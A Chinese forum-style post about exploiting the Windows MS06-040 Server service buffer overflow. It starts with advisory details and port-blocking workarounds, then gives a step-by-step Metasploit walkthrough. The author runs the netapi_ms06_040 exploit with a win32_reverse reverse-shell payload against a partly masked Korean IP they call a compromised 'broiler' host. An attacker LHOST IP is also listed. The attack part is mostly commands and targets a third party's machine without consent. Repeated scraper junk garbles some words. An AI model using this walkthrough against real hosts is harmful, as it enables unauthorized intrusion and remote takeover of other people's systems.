MS06040漏洞的利用

zyp

Microsoft Windows Server服务远程缓冲区溢出漏洞 (MS06-040)<br/>　　<br/>发布Do not irrigate.Otherwise deletes ID...期：2006-08-08<br/>更新Do not irrigate.Otherwise deletes ID...期：2006-08-09<br/>　　<br/>受影响系统：<br/>Microsoft Windows XP SP2<br/>Microsoft Windows XP SP1<br/>Microsoft Windows Server 2003 SP1<br/>Microsoft Windows Server 2003<br/>Microsoft Windows 2000SP4<br/>BUGTRAQ ID: 19409<br/>CVE(CAN) ID: CVE-2006-3439<br/>　　m7UVV<br/>Microsoft Windows是微软发布的非常流行的Do not irrigate.Otherwise deletes ID...作系统。<br/>Microsoft Windows的Server服务在处理RPC通讯中的恶意消息时存在溢出漏洞，远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞，导致执行任意代码.<br/>　　<br/>临时解决方法<br/><br/>如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：<br/>　　<br/>* 在防火墙阻断TCP 139和445端口。<br/>* 使用个人防火墙，如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。<br/>* 在支持的系统上启用高级TCP/IP过滤功能。<br/>* 在受影响的系统上使用IPSec阻断受影响的端口。<br/><br/>废话就不多说了,昨天朋友给了溢出工具,顺便测试了一下,成功率还真TMD的高.就拿一台韩国肉鸡做实验. <br/>　<br/>目标: 211.234.*.104<br/>　<br/>工具: Metasploit V2.6<br/>Download: <br/>http://www.metasploit.com/tools/framework-2.6.exe<br/>ActivePerl-5.8.7.815-MSWin32-x86-211909.msi <br/>(Perl解释器,必须安装)<br/>　　<br/>下载下来先升级,运行安装目录下的 msfupdate.bat 文件 (要等蛮久,耐心点).<br/>　　<br/>这个工具详细Do not irrigate.Otherwise deletes ID...作我就不多说了,我只介绍与这个漏洞有关的命令(当然,其他漏洞利用Do not irrigate.Otherwise deletes ID...作大同小异).<br/>　<br/>运行 msfconsole.bat , 这是控制台程序,升级完毕后界面如图1<br/>1.输入命令 show exploits //显示溢出利用程序,里面有153个溢出程序,可以根据你们自己的需要来使用.<br/>2.输入命令 use netapi_ms06_040 //使用netapi_ms06_040 利用程序<br/>3.输入命令 show payloads //显示可用的shellcode例表,这里我们主要用 win32_reverse <br/>这个Shellcode<br/>　<br/>4.输入命令 set PAYLOAD win32_reverse //设置 PAYLOAD 为 <br/>win32_reverse<br/>5.输入命令 set RHOST 211.234.*.104 //设置被攻击的主机的IP <br/><br/>6.输入命令 set LHOST 125.71.2.104 //设置本机的IPD<br/><br/>7.输入命令 set TARGET 0 //设置溢出类型 一般选0<br/>8.输入命令 set //检查输入的信息<br/><br/>9.输入命令 exploit //开始溢出~<br/>这样就溢出成功了.<br/><br/>文章没技术含量,就是需要能熟悉运用 Metasploit 工具,好了 就到这.